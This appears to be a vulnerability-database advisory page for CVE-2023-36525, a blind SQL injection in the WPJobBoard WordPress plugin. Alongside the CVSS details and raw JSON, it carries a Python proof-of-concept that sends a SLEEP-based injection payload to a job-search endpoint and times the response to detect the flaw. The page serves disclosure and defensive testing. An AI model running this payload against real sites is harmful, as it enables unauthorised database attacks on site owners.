Security Vulnerability Report
中文
CVE-2023-36525 CVSS 8.6 HIGH

CVE-2023-36525

Published: 2025-12-24 13:16:06
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPJobBoard allows Blind SQL Injection.This issue affects WPJobBoard: from n/a through 5.9.0.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

WPJobBoard 所有版本 ≤ 5.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2023-36525 - WPJobBoard Blind SQL Injection PoC Note: This is a demonstration code for security research purposes only. """ import requests import time import string import sys target = "http://target-site.com/" # Plugin endpoint that handles job search queries endpoint = target + "wp-json/wpjobboard/v1/jobs" def test_vulnerability(): """Test if target is vulnerable to CVE-2023-36525""" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } # Normal request normal_payload = {"search": "test"} # Time-based blind SQL injection payload # If vulnerable, response will be delayed by ~5 seconds sql_payload = { "search": "test' AND (SELECT * FROM (SELECT SLEEP(5))s1) AND '1'='1" } print("[*] Testing CVE-2023-36525 - WPJobBoard Blind SQL Injection") print(f"[*] Target: {endpoint}") # Test normal request start = time.time() try: r1 = requests.get(endpoint, params=normal_payload, headers=headers, timeout=10) normal_time = time.time() - start print(f"[*] Normal request time: {normal_time:.2f}s") except requests.exceptions.RequestException as e: print(f"[!] Error with normal request: {e}") return False # Test malicious request start = time.time() try: r2 = requests.get(endpoint, params=sql_payload, headers=headers, timeout=15) sql_time = time.time() - start print(f"[*] SQL injection request time: {sql_time:.2f}s") except requests.exceptions.Timeout: print("[+] Target appears VULNERABLE (request timed out)") return True except requests.exceptions.RequestException as e: print(f"[!] Error with SQL request: {e}") return False # Check if response time indicates vulnerability if sql_time > 4.5: print("[+] Target appears VULNERABLE to CVE-2023-36525") return True else: print("[-] Target may not be vulnerable") return False if __name__ == "__main__": test_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-36525", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:05.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPJobBoard allows Blind SQL Injection.This issue affects WPJobBoard: from n/a through 5.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/wpjobboard/vulnerability/wordpress-wpjobboard-plugin-5-9-0-unauth-blind-sql-injection-sqli-vulnerability?_s_id=cve", "source": "[email protected]"}]}}